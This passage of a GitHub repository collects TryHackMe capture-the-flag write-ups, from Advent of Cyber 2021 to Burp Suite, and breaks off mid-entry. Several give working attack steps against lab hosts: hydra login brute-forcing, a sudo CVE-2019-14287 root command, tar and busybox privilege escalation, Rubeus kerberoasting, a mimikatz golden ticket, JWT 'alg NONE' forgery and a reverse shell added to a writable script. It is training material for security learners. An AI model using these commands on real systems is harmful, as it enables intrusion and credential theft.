"Advent-of-Cyber-2021/Day-12-Sharing_Without_Caring/README.md", "content": "Day12 - Sharing Without Caring\n\n- Scan the target server with the IP 10.10.112.197. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn 10.10.112.197 for the scan to work correctly. How many TCP ports are open?\n\n\t- `*`\n\n- In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?\n\n\t- `****`\n\n- How many shares did you find?\n\n\t- `*`\n\n- How many shares show “everyone”?\n\n\t- `*`\n\n- What is the title of file 2680-0.txt?\n\n\t- `***********`\n\n- It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?\n\n\t- `************`\n\n- We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?\n\n\t- `*******************************`" }, { "path": "Advent-of-Cyber-2021/Day-13-They_Lost_The_Plan/README.md", "content": "# Day 13 - They Lost The Plan!\n\n\n- Complete the username: p.....\n\n\t- `*****`\n\n- What is the OS version?\n\n\t- `**********************`\n\n- What backup service did you find running on the system?\n\n\t- `***********`\n\n- What is the path of the executable for the backup service you have identified?\n\n\t- `**************************************************`\n\n- Run the whoami command on the connection you have received on your attacking machine. What user do you have?\n\n\t- `**********************`\n\n- What is the content of the flag.txt file?\n\n\t- `************`\n\n- The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?\n\n\t- `**********`" }, { "path": "Advent-of-Cyber-2021/Day-14-Dev(Insecure)Ops/README.md", "content": "Day 14 - Dev(Insecure)Ops\n\n\n- How many pages did the dirb scan find with its default wordlist?\n\n\t- `*`\n\n- How many scripts do you see in the /home/thegrinch/scripts folder?\n\n\t- `*`\n\n- What are the five characters following $6$G in pepper's password hash?\n\n\t- `*****`\n\n- What is the content of the flag.txt file on the Grinch's user’s desktop?\n\n\t- `***************************`" }, { "path": "Advent-of-Cyber-2021/Day-15-The_Grinchs_day_off/README.md", "content": "# Day 15 - The Grinchs day off" }, { "path": "Advent-of-Cyber-2021/Day-16-Ransomware_Madness/README.md", "content": "# Day 16 - Ransomware Madness\n\n- !!! ВАЖНЫЙ !!!\n\n\t\tNo answer needed\n\n- What is the operator's username?\n\n\t- `************`\n\n- What social media platform is the username associated with?\n\n\t- `*******`\n\n- What is the cryptographic identifier associated with the operator?\n\n\t- `********************************`\n\n- What platform is the cryptographic identifier associated with?\n\n\t- `*********`\n\n- What is the bitcoin address of the operator?\n\n\t- `**********************************`\n\n- What platform does the operator leak the bitcoin address on? \n\n\t- `******`\n\n- What is the operator's personal email?\n\n\t- `*****************`\n\n- What is the operator's real name?\n\n\t- `***********`\n" }, { "path": "Advent-of-Cyber-2021/Day-17-Elf_Leaks/README.md", "content": "# Day 17 - Elf Leaks\n\n\n- What is the name of the S3 Bucket used to host the HR Website announcement?\n\n\t- `******.*******************.***`\n\n- What is the message left in the flag.txt object from that bucket?\n\n\t- `**** **** ** *** **** ***** **** **** *** ***** ** ** **** ** *****`\n\n- What other file in that bucket looks interesting to you?\n\n\t- `*********.***`\n\n- What is the AWS Access Key ID in that file?\n\n\t- `********************`\n\n- What is the AWS Account ID that access-key works for?\n\n\t- `************`\n\n- What is the Username for that access-key?\n\n\t- `***********.***`\n\n- There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?\n\n\t- `*********`\n\n- What is the database password stored in Secrets Manager?\n\n\t- `***********`\n" }, { "path": "Advent-of-Cyber-2021/Day-18-Playing_With_Containers/README.md", "content": "# Day 18 - Playing With Containers\n\n- What command will list container images stored in your local container registry?\n\n\t- `****** ******`\n\n- What command will allow you to save a docker image as a tar archive?\n\n\t- `****** ****`\n\n- What is the name of the file (including file extension) for the configuration, repository tags, and layer hash values stored in a container image?\n\n\t- `********.****`\n\n- What is the token value you found for the bonus challenge?\n\n\t- `********************************`\n" }, { "path": "Advent-of-Cyber-2021/Day-19-Something_Phishy_Is_Going_On/README.md", "content": "# Day 19 - Something Phishy Is Going On\n\n- Who was the email sent to? (Answer is the email address)\n\n\t- `******************.***`\n\n- Phishing emails use similar domains of their targets to increase the likelihood the recipient will be tricked into interacting with the email. Who does it say the email was from? (Answer is the email address)\n\n\t- `********************.****`\n\n- Sometimes phishing emails have a different reply-to email address. If this email was replied to, what email address will receive the email response?\n\n\t- `****************.******`\n\n- Less sophisticated phishing emails will have typos. What is the misspelled word?\n\n\t- `*******`\n\n- The email contains a link that will redirect the recipient to a fraudulent website in an effort to collect credentials. What is the link to the credential harvesting website?\n\n\t- `*****://**********.******/***/*******/`\n\n- View the email source code. There is an unusual email header. What is the header and its value?\n\n\t- `*************: ****`\n\n- You received other reports of phishing attempts from other colleagues. Some of the other emails contained attachments. Open attachment.txt. What is the name of the attachment?\n\n\t- `***************************.***`\n\n- What is the flag in the PDF file?\n\n\t- `***{***************************}`\n\nIf you want to learn more about phishing, check out the \"Phishing\" module on TryHackMe.\n\n\t\tNo answer needed" }, { "path": "Advent-of-Cyber-2021/Day-20-What_s_the_Worst_That_Could_Happen/README.md", "content": "# Day 20 - What's the Worst That Could Happen?\n\n- Open the terminal and navigate to the file on the desktop named 'testfile'. Using the 'strings' command, check the strings in the file. There is only a single line of output to the 'strings' command. What is the output?\n\n\t- `**************************}*****************************************`\n\n- Check the file type of 'testfile' using the 'file' command. What is the file type?\n\n\t- `***** ***** **** *****`\n\n- Calculate the file's hash and search for it on VirusTotal. When was the file first seen in the wild?\n\n\t- `********** **:**:**`\n\n- On VirusTotal's detection tab, what is the classification assigned to the file by Microsoft?\n\n\t- `*****:***/***************`\n\n- Go to this link to learn more about this file and what it is used for. What were the first two names of this file?\n\n\t- `*******.*** ** ************.***`\n\n- The file has 68 characters in the start known as the known string. It can be appended with whitespace characters upto a limited number of characters. What is the maximum number of total characters that can be in the file?\n\n\t- `***`" }, { "path": "Advent-of-Cyber-2021/Day-21-Needles_In_Computer_Stacks/README.md", "content": "# Day 21 - Needles In Computer Stacks\n\n- We changed the text in the string $a as shown in the eicaryara rule we wrote, from X5O to X50, that is, we replaced the letter O with the number 0. The condition for the Yara rule is $a and $b and $c and $d. If we are to only make a change to the first boolean operator in this condition, what boolean operator shall we replace the 'and' with, in order for the rule to still hit the file?\n\n\t- `**`\n\n- What option is used in the Yara command in order to list down the metadata of the rules that are a hit to a file? \n\n\t- `**`\n\n- What section contains information about the author of the Yara rule?\n\n\t- `********`\n\n- What option is used to print only rules that did not hit?\n\n\t- `**`\n\n- Change the Yara rule value for the $a string to X50. Rerun the command, but this time with the -c option. What is the result?\n\n\t- `*`" }, { "path": "Advent-of-Cyber-2021/Day-22-How_It_Happened/README.md", "content": "# Day 22 - How It Happened\n\n- What is the username (email address of Grinch Enterprises) from the decoded script?\n\n\t- `******.***********.**********.***`\n\n- What is the mailbox password you found?\n\n\t- `*******************`\n\n- What is the subject of the email?\n\n\t- `********* ********`\n\n- What port is the script using to exfiltrate data from the North Pole?\n\n\t- `***`\n\n- What is the flag hidden found in the document that Grinch Enterprises left behind? (Hint: use the following command oledump.py -s {stream number} -d, the answer will be in the caption).\n\n\t- `********************`\n\n- There is still a second flag somewhere... can you find it on the machine?\n\n\t- `*********************`" }, { "path": "Advent-of-Cyber-2021/Day-23-PowershELlF_Magic/README.md", "content": "# Day 23 - PowershELlF Magic\n\n- What command was executed as Elf McNealy to add a new user to the machine?\n\n\t- `****************`\n\n- What user executed the PowerShell file to send the password.txt file from the administrator's desktop to a remote server?\n\n\t- `*****`\n\n- What was the IP address of the remote server? What was the port used for the remote connection? (format: IP,Port)\n\n\t- `**.**.***.**,****`\n\n- What was the encryption key used to encrypt the contents of the text file sent to the remote server?\n\n\t- `********************************`\n\n- What application was used to delete the password.txt file?\n\n\t- `*******.***`\n\n- What is the date and timestamp the logs show that password.txt was deleted? (format: MM/DD/YYYY H:MM:SS PM)\n\n\t- `**/**/**** *:**:** **`\n\n- What were the contents of the deleted password.txt file?\n\n\t- `******* *******: ***************************`\n" }, { "path": "Advent-of-Cyber-2021/Day-24-Learning_From_The_Grinch/README.md", "content": "# Day 24 - Learning From The Grinch\n\n- What is the username of the other user on the system?\n\n\t- `*****`\n\n- What is the NTLM hash of this user?\n\n\t- `********************************`\n\n- What is the password for this user?\n\n\t- `**********`\n" }, { "path": "Advent-of-Cyber-2021/README.md", "content": "# Advent of Cyber 2021 🎄🎅\n\n## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)\n\n\n![aoc-logo](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2021/aoc.png)\n\nFor this year I didn't provide my solution to the challenges since there are ready amazing YT videos. Thanks THM :)\n\n![aoc-certificate](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2021/aoc2021.png)\n" }, { "path": "Agent-Sudo/README.md", "content": "# Agent Sudo\n\n\n- Deploy the machine\n\n\t no answer needed\n\n- How many open ports?\n\n\t- `nmap `\n\t- `3`\n\n- How you redirect yourself to a secret page?\n\n\t- `user-agent`\n\n- What is the agent name?\n\n\t- Let's try changing the user-agent.\n\t- `curl -A \"A\" -L `. Mmmmh...\n\t- `curl -A \"C\" -L `. Got it.\n\t- `chris`\n\n- FTP password\n\n\t- `hydra -l chris -P /usr/share/wordlists/rockyou.txt -vV -t 4 ftp`\n\t- `crystal`\n\n- steg password\n\n\t- `ftp `\n\t- Enter username `chris` and password `crystal`.\n\t- `mget *`\n\t- By `ToAgentJ.txt` I can understand there is a pic that isn't a photo actually.\n\t- In fact, `binwalk -e cutie.png` extracts useful data.\n\t- `cd _cutie.png.extracted`\n\t- `zip2john 8702.zip > zip.hash`\n\t- `john zip.hash` and we get the password\n\t- `7z e zip.hash`, enter `Y` and the password.\n\t- `cat ToAgentR.txt`\n\t- Inserting that weird string into CyberChef (from Base64) we get `Area51`.\n\t- `Area51`\n\n- Zip file password\n\n\t- `alien`\n\n- Who is the other agent (in full name)?\n\n\t- `steghide info cute-alien.jpg`, enter `y` and the passphrase (`Area51`).\n\t- There is a message.txt inside\n\t- `steghide extract -sf cute-alien.jpg`\n\t- `james`\n\n- SSH password\n\n\t- `hackerrules!`\n\n- What is the user flag?\n\n\t- `ssh james@` and then enter the password.\n\t- `cat user_flag.txt`\n\t- `b0**975e8******041**********13c7`\n\n- What is the incident of the photo called?\n\n\t- Enable ssh on your machine\n\t- `scp Alien_autospy.jpg YOUR-USER-HERE@YOUR-IP-HERE:Alien_autospy.jpg`\n\t- Search that photo with Google Reverse Image.\n\t- `Roswell Alien Autopsy`\n\n- CVE number for the escalation (Format: CVE-xxxx-xxxx)\n\n\t- `sudo -l`\n\t- `CVE-2019-14287` ([exploit-db](https://www.exploit-db.com/))\n\n- What is the root flag?\n\n\t- `sudo -u \\#$((0xffffffff)) /bin/bash`\n\t- `id`\n\t- `cat /root/root.txt`\n\t- `b53**2f55b57******3341**********`\n\t- `Deskel`\n\n\n\n" }, { "path": "Agent-Sudo/To_agentJ.txt", "content": "Dear agent J,\n\nAll these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.\n\nFrom,\nAgent C\n" }, { "path": "Agent-Sudo/_cutie.png.extracted/To_agentR.txt", "content": "Agent C,\n\nWe need to send the picture to 'QXJlYTUx' as soon as possible!\n\nBy,\nAgent R\n" }, { "path": "Agent-Sudo/_cutie.png.extracted/zip.hash", "content": "8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip\n" }, { "path": "Agent-Sudo/message.txt", "content": "Hi james,\n\nGlad you find this message. Your login password is hackerrules!\n\nDon't ask me why the password look cheesy, ask agent R who set this password for you.\n\nYour buddy,\nchris\n" }, { "path": "Anonymous/README.md", "content": "# Anonymous\n\n- Enumerate the machine. How many ports are open?\n\n\t- `scilla port -target `\n\t- `*`\n\n- What service is running on port 21?\n\n\t- `ftp`\n\n- What service is running on ports 139 and 445?\n\n\t- `smb`\n\n- There's a share on the user's computer. What's it called?\n\n\t- `smbclient -L `\n\t- `****`\n\n- user.txt\n\n\t- Connect in anonymous mode via ftp and download everything.\n\t- We can write `clean.sh`, so add a reverse shell.\n\t- Fire up a shell and cat the flag.\n\t- `**********************`\n\n- root.txt\n\n\t- `sudo -l`\n\t- `find / -user root -perm -u=s 2>/dev/null`\n\t- `/usr/bin/env`\n\t- `env /bin/sh -p`\n\t- `cat /root/root.txt`\n\t- `*******************************`\n" }, { "path": "Attacking-Kerberos/README.md", "content": "# Attacking Kerberos\n\n- What does TGT stand for?\n\n\t- `ticket granting ticket`\n\n- What does SPN stand for?\n\n\t- `service principal name`\n\n- What does PAC stand for?\n\n\t- `privilege attribute certificate`\n\n- What two services make up the KDC?\n\n\t- `AS, TGS`\n\n- Deploy the Machine\n\n\t no answer needed\n\n- How many total users do we enumerate?\n\n\t- `sudo vim /etc/hosts`, insert the row `\tCONTROLLER.local`\n\t- Download [User.txt](https://github.com/Cryilllic/Active-Directory-Wordlists/blob/master/User.txt)\n\t- `kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt`\n\t- `**`\n\n- What is the SQL service account name?\n\n\t- `sql*******`\n\n- What is the second \"machine\" account name?\n\n\t- `*******2`\n\n- What is the third \"user\" account name?\n\n\t- `****3`\n\n- Which domain admin do we get a ticket for when harvesting tickets?\n\n\t- `ssh Administrator@controller.local`, `yes` and inters password.\n\t- `cd Downloads`\n\t- `Rubeus.exe harvest /interval:30`\n\t- `echo CONTROLLER.local >> C:\\Windows\\System32\\drivers\\etc\\hosts`\n\t- `Rubeus.exe brute /password:Password1 /noticket`\n\t- `Ad************`\n\n- Which domain controller do we get a ticket for when harvesting tickets?\n\n\t- `**********-1`\n\n- What is the HTTPService Password?\n\n\t- `cd Downloads`\n\t- `Rubeus.exe kerberoast`\n\t- `copy the hash onto your attacker machine and put it into a .txt file so we can crack it with hashcat`\n\t- [wordlist](https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt)\n\t- `hashcat -m 13100 -a 0 hash.txt Pass.txt`\n\t- `**********`\n\n- What is the SQLService Password?\n\n\t- `**************`\n\n- What hash type does AS-REP Roasting use?\n\n\t- `cd Downloads`\n\t- `Rubeus.exe asreproast`\n\t- `Transfer the hash from the target machine over to your attacker machine and put the hash into a txt file`\n\t- `Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User.....`\n\t- `hashcat -m 18200 hash.txt Pass.txt`\n\t- `Kerberos * ****** ***** **`\n\n- Which User is vulnerable to AS-REP Roasting?\n\n\t- `****3`\n\n- What is the User's Password?\n\n\t- `*********3`\n\n- Which Admin is vulnerable to AS-REP Roasting?\n\n\t- `*****2`\n\n- What is the Admin's Password?\n\n\t- `**********`\n\n- I understand how a pass the ticket attack works\n\n\t no answer needed\n\n- What is the SQLService NTLM Hash?\n\n\t- `cd downloads && mimikatz.exe`\n\t- `privilege::debug`\n\t- `lsadump::lsa /inject /name:krbtgt`\n\t- `Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:`\n\t- `misc::cmd`\n\t- `****************************`\n\n- What is the Administrator NTLM Hash?\n\n\t- `****************************`\n\n- I understand how to implant a skeleton key into a domain controller with mimikatz\n\n\t no answer needed\n\n- I Understand the Basics of Attacking Kerberos\n\n\t no answer needed\n" }, { "path": "Attacktive-Directory/README.md", "content": "# Attacktive Directory\n\n- Initiate the VPN connection and deploy the machine!\n\n\t no answer needed\n\n- Read and follow along with the above.\n\n\t no answer needed\n\n- What tool will allow us to enumerate port 139/445?\n\n\t- `enum4linux`\n\n- What is the NetBIOS-Domain Name of the machine?\n\n\t- `THM-AD`\n\n- What invalid TLD do people commonly use for their Active Directory Domain?\n\n\t- `.local`\n\n- What command within Kerbrute will allow us to enumerate valid usernames?\n\n\t- `userenum`\n\n- What notable account is discovered? (These should jump out at you)\n\n\t- `sudo echo spookysec.local >> /etc/hosts`\n\t- `kerbrute userenum --dc spookysec.local -d spookysec.local User.txt`\n\t- `sv*******`\n\n- What is the other notable account is discovered? (These should jump out at you)\n\n\t- `******`\n\n- We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?\n\n\t- `impacket-GetNPUsers spookysec.local/sv******** -no-pass`\n\t- `sv*******`\n\n- Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)\n\n\t- `kerberos * ****** ***** 32`\n\n- What mode is the hash?\n\n\t- `182**`\n\n- Now crack the hash with the modified password list provided, what is the user accounts password?\n\n\t- `hashcat -m 182** kerberos_hash Pass.txt --force`\n\t- `**************`\n\n- Using utility can we map remote SMB shares?\n\n\t- `smbclient`\n\n- Which option will list shares?\n\n\t- `-l`\n\n- How many remote shares is the server listing?\n\n\t- `smbclient -L spookysec.local -U 'sv*******'`\n\t- `*`\n\n- There is one particular share that we have access to that contains a text file. Which share is it?\n\n\t- `msfconsole`\n\t- `search admin/smb/download_file`\n\t- `use 0`\n\t- `show options`\n\t- `set RHOSTS spookysec.local`\n\t- `set RPATH backup_credentials.txt`\n\t- `set SMBDOMAIN spookysec.local`\n\t- `set SMBPASS **************`\n\t- `set SMBSHARE backup`\n\t- `set SMBUSER sv*******`\n\t- `exploit`\n\t- `backup`\n\n- What is the content of the file?\n\n\t- `***********************************************************`\n\n- Decoding the contents of the file, what is the full contents?\n\n\t- `echo ***************************************** | base64 -d`\n\t- `********************************`\n\n- What method allowed us to dump NTDS.DIT?\n\n\t- `DRS****`\n\n- What is the Administrators NTLM hash?\n\n\t- `impacket-secretsdump -just-dc ba**************************`\n\t- `******************************`\n\n- What method of attack could allow us to authenticate as the user without the password?\n\n\t- `pass the hash`\n\n- Using a tool called Evil-WinRM what option will allow us to use a hash?\n\n\t- `-h`\n\n- svc-admin\n\n\t- `************************+`\n\n- backup\n\n\t- `************************`\n\n- Administrator\n\n\t- `*************************`\n" }, { "path": "Authenticate/README.md", "content": "# Authenticate\n\n- Deploy the VM\n\n\t no answer needed\n\n- What is the flag you found after logging as Jack?\n\n\t- `fad9d***********************`\n\n- Now try the same thing for username Mike\n\n\t no answer needed\n\n- What is the flag you found after logging as Mike?\n\n\t- `e1faaa************************`\n\n- What is the flag that you found in darren's account?\n\n\t- `fe860*************************`\n\n- Now try to do the same trick and see if you can login as arthur.\n\n\t no answer needed\n\n- What is the flag that you found in arthur's account?\n\n\t- `d9ac0*************************`\n\n- Use the same method to find identity of admin user and retrieve the flag? \n\n\t- `echo \"{\"typ\":\"JWT\",\"alg\":\"NONE\"}\" | base64`\n\t- ` echo \"{\"exp\":1586620929,\"iat\":1586620629,\"nbf\":1586620629,\"identity\":0}\" | base64`\n\t- `92498*******************`\n\n- Find the way to get into superadmin ad\n\n\t no answer needed\n\n- What is the password for superadmin account?\n\n\t- `abc******`\n\n- What is the flag you found in superadmin account?\n\n\t- `7210*****************`\n\n\n" }, { "path": "Avengers-Blog/README.md", "content": "# Avengers Blog\n\n- Connect to our network by going to your access page. This is important as you will not be able to access the machine without connecting!\n\n\t no answer needed\n\n- Deploy the machine by clicking the green \"Deploy\" button on this task and access its webserver.\n\n\t no answer needed\n\n- On the deployed Avengers machine you recently deployed, get the flag1 cookie value.\n\n\t- `*****************`\n\n- Look at the HTTP response headers and obtain flag 2.\n\n\t- `headers***************`\n\n- Look around the FTP share and read flag 3!\n\n\t- `nmap -v `\n\t- `ftp `, enter user and password.\n\t- `ls`\n\t- `cd files`\n\t- `get flag3.txt`\n\t- `exit`\n\t- `cat flag3.txt`\n\t- `*************************************`\n\n- What is the directory that has an Avengers login?\n\n\t- `scilla dir -target `\n\t- `/p*****`\n\n- Log into the Avengers site. View the page source, how many lines of code are there?\n\n\t- `***`\n\n- Read the contents of flag5.txt\n\n\t- `rev ../flag5.txt`\n\t- `echo \"FLAG\" | rev`\n\t- `********************************`\n\n\n" }, { "path": "Baron-Samedit/README.md", "content": "# Baron Samedit\n\n- Deployed!\n\n\t no answer needed\n\n- After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?\n\n\t- `ssh tryhackme@` and enter the password `tryhackme`\n\t- `cd Exploit`\n\t- `make`\n\t- `sudo-h****************`\n\n- Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?\n\n\t- `cat /etc/os-release*`\n\t- `./sudo-h**************** 0`\n\t- `cd /root`\n\t- `cat flag.txt`\n\t- `THM{********************************}`\n" }, { "path": "Bash-Scripting/README.md", "content": "# Bash Scripting\n\n- Are you ready to go!\n\n\t no answer needed\n\n- What piece of code can we insert at the start of a line to comment out our code?\n\n\t- `#`\n\n- What will the following script output to the screen, echo “BishBashBosh”\n\n\t- `BishBashBosh`\n\n- What would this code return?\n\n\t- `Jammy is 21 years old`\n\n- How would you print out the city to the screen?\n\n\t- `echo $city`\n\n- How would you print out the country to the screen?\n\n\t- `echo $country`\n\n- How can we get the number of arguments supplied to a script?\n\n\t- `$#`\n\n- How can we get the filename of our current script(aka our first argument)?\n\n\t- `$0`\n\n- How can we get the 4th argument supplied to the script?\n\n\t- `$4`\n\n- If a script asks us for input how can we direct our input into a variable called ‘test’ using “read”\n\n\t- `read test`\n\n- What will the output of “echo $1 $3” if the script was ran with “./script.sh hello hola aloha”\n\n\t- `hello aloha`\n\n- What would be the command to print audi to the screen using indexing.\n\n\t- `echo \"${cars[1]}\"`\n\n- If we wanted to remove tesla from the array how would we do so?\n\n\t- `unset cars[3]`\n\n- How could we insert a new value called toyota to replace tesla?\n\n\t- `cars[3]=\"toyota\"`\n\n- What is the flag to check if we have read access to a file?\n\n\t- `-r`\n\n- What is the flag to check to see if it's a directory?\n\n\t- `-d`\n\n- Well done!\n\n\t no answer needed\n\n\n\n\n" }, { "path": "Bebop/README.md", "content": "# Bebop\n\n- Deploy the machine\n\n\t no answer needed\n\n- What is your codename?\n\n\t- `pilot`\n\n- What is the User Flag?\n\n\t- `scilla port -target `\n\t- `nmap -p 22,23 -A `\n\t- `telnet 23` as `pilot`\n\t- `ls`\n\t- `cat user.txt`\n\t- `**********************`\n\n- What is the Root Flag?\n\n\t- `sudo -l`\n\t- `(root) NOPASSWD: /usr/local/bin/busybox`\n\t- Visit GTFObins, busybox.\n\t- `sudo busybox sh`\n\t- `id`\n\t- `cat /root/root.txt`\n\t- `**************************`\n\n- What is the low privilleged user?\n\n\t- `pilot`\n\n- What binary was used to escalate privileges?\n\n\t- `busybox`\n\n- What service was used to gain an initial shell?\n\n\t- `telnet`\n\n- What Operating System does the drone run?\n\n\t- `FreeBSD`\n\n- Watch the video.\n\n\t no answer needed\n\n\n" }, { "path": "Bolt/README.md", "content": "# Bolt\n\n- Start the machine\n\n\t no answer needed\n\n- What port number has a web server with a CMS running?\n\n\t- `nmap -sV `\n\t- `8000`\n\n- What is the username we can find in the CMS?\n\n\t- `bolt`\n\n- What is the password we can find for the username?\n\n\t- `*****d*in123`\n\n- What version of the CMS is installed on the server? (Ex: Name 1.1.1)\n\n\t- Login into the page `/bolt` with username and password previously found.\n\t- `Bolt 3.7.1`\n\n- There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?\n\n\t- Search on Google `Bolt RCE Exploit DB`\n\t- `***2*`\n\n- Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)\n\n\t- `msfconsole`\n\t- `search bolt`\n\t- `use *`\n\t- `exploit/unix/******************************`\n\n- Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit\n\n\t no answer needed\n\n\t- `set LHOST `\n\t- `set LPORT 1234`\n\t- `set RHOST `\n\t- `set USERNAME bolt`\n\t- `set PASSWORD ************`\n\n- Look for flag.txt inside the machine.\n\n\t- `exploit`\n\t- `cat $(find / | grep flag.txt)`\n\t- `THM{***************************}`\n\n\n\n\n" }, { "path": "Bounty-Hacker/README.md", "content": "# Bounty Hacker\n\nYou were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!\n\n- Deploy the machine.\n\n\t no answer needed\n\n- Find open ports on the machine\n\n\t no answer needed\n\n\t- `nmap -Pn `\n\n- Who wrote the task list?\n\n\t- `ftp `\n\t- `user`\n\t- `anonymous`\n\t- `recv locks.txt`\n\t- `recv task.txt`\n\t- `cat task.txt`\n\t- `lin`\n\n- What service can you bruteforce with the text file found?\n\n\t- `ssh`\n\n- What is the users password? \n\n\t- `hydra -s 22 -v -V -l 'lin' -P locks.txt -t 8 ssh`\n\t- `RedDr4gonSynd1cat3`\n\n- user.txt\n\n\t- `ssh lin@` and the enter `yes` and the password `RedDr4gonSynd1cat3`\n\t- `ls`\n\t- `cat user.txt`\n\t- `THM{******SyNd1C4T3}`\n\n- root.txt\n\n\t- Type `sudo -l`, enter the password and you can see lin user can run `tar` command with sudo.\n\t- Search on [GTFObins](https://gtfobins.github.io/) `tar`\n\t- Then search for `sudo`\n\t- Found this: `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`\n\t- Execute this and then `cat /root/root.txt`\n\t- `THM{*************}`\n\n\n\n\n" }, { "path": "Bounty-Hacker/locks.txt", "content": "rEddrAGON\nReDdr4g0nSynd!cat3\nDr@gOn$yn9icat3\nR3DDr46ONSYndIC@Te\nReddRA60N\nR3dDrag0nSynd1c4te\ndRa6oN5YNDiCATE\nReDDR4g0n5ynDIc4te\nR3Dr4gOn2044\nRedDr4gonSynd1cat3\nR3dDRaG0Nsynd1c@T3\nSynd1c4teDr@g0n\nreddRAg0N\nREddRaG0N5yNdIc47e\nDra6oN$yndIC@t3\n4L1mi6H71StHeB357\nrEDdragOn$ynd1c473\nDrAgoN5ynD1cATE\nReDdrag0n$ynd1cate\nDr@gOn$yND1C4Te\nRedDr@gonSyn9ic47e\nREd$yNdIc47e\ndr@goN5YNd1c@73\nrEDdrAGOnSyNDiCat3\nr3ddr@g0N\nReDSynd1ca7e\n" }, { "path": "Bounty-Hacker/task.txt", "content": "1.) Protect Vicious.\n2.) Plan for Red Eye pickup on the moon.\n\n-lin\n" }, { "path": "Brooklyn-Nine-Nine/README.md", "content": "# Brooklyn Nine Nine\n\n- User flag\n\n\t- `scilla port -p -1000 `\n\t- Three ports open.\n\t- `ftp ` with username anonymous and no pwd.\n\t- `get note_to_jake.txt`\n\t- `cat note_to_jake.txt`\n\t- Cool.\n\t- `hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh:// -f -VV -t 4`\n\t- `ssh jake@` and enter the pwd.\n\t- `ls -alh`\n\t- `cd ..`\n\t- `cd holt`\n\t- `ls -lah`\n\t- `cat user.txt`\n\t- `********************************`\n\n- Root flag\n\n\t- `sudo -l`\n\t- `sudo less /root/root.txt`\n\t- `********************************`\n\n\n\n" }, { "path": "Brute-It/README.md", "content": "# Brute It\n\n- Deploy the machine\n\n\t no answer needed\n\n- How many ports are open?\n\n\t- `nmap -p- ` or\n\t- `scilla port -target `\n\t- `2`\n\n- What version of SSH is running?\n\n\t- `nmap -sS -sV -Pn -p 22 `\n\t- `OpenSSH 7.6p1`\n\n- What version of Apache is running?\n\n\t- `nmap -sS -sV -Pn -p 80 `\n\t- `2.*.**`\n\n- Which Linux distribution is running?\n\n\t- `Ubuntu`\n\n- What is the hidden directory?\n\n\t- `scilla dir -target `\n\t- `/admin`\n\n- What is the user:password of the admin panel?\n\n\t- `hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form \"/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid\" -f`\n\t- `admin:******`\n\n- What is John's RSA Private Key passphrase?\n\n\t- `python2 /usr/share/john/ssh2john.py rsa_priv > hash`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt hash`\n\t- `**********`\n\n- user.txt\n\n\t- `chmod 400 hash`\n\t- `ssh john@ -i rsa_priv and enter the passphrase`\n\t- `cat user.txt`\n\t- `THM{***************************}`\n\n- Web flag\n\n\t- `THM{********************}`\n\n- What is the root's password?\n\n\t- `sudo cat /etc/shadow`\n\t- `sudo cat /etc/passwd`\n\t- Copy these two files into your machine\n\t- `unshadow passwd shadow > passwords.txt`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt`\n\t- `*********`\n\n- root.txt\n\n\t- `sudo -l`\n\t- https://gtfobins.github.io/gtfobins/cat/\n\t- `sudo cat /root/` :)\n\n\n" }, { "path": "Burp-Suite/README.md", "content": "# Burp Suite\n\n- Read the overview and continue on into installation!\n\n\t no answer needed\n\n- If you'll be installing Burp (as it's commonly referred to) from scratch, you'll need to first visit this link: https://portswigger.net/burp/communitydownload\n\n\t no answer needed\n\n- Once you've reached the Port Swigger downloads page, go ahead and download the appropriate version for your operating system\n\n\t no answer needed\n\n- Once you've got everything setup move onto our next task, Gettin' [CA] Certified!\n\n\t no answer needed\n\n- Launch Burp!\n\n\t no answer needed\n\n- Once this pops-up, click 'Temporary project' and then 'Next'.\n\n\t no answer needed\n\n- This option is included as it can be incredibly useful to create a custom configuration file for your proxy or other settings, especially depending on how your network configuration and/or if Burp Suite is being launched remotely such as via x11 forwarding.\n\n\t no answer needed\n\n- Finally, let's go ahead and Start Burp! Click 'Start Burp' now!\n\n\t no answer needed\n\n- Since we now have Burp Suite running, the proxy service will have started by default with it. In order to fully leverage this proxy, we'll have to install the CA certificate included with Burp Suite (otherwise we won't be able to load anything with SSL). To do this, let's launch Firefox now!\n\n\t no 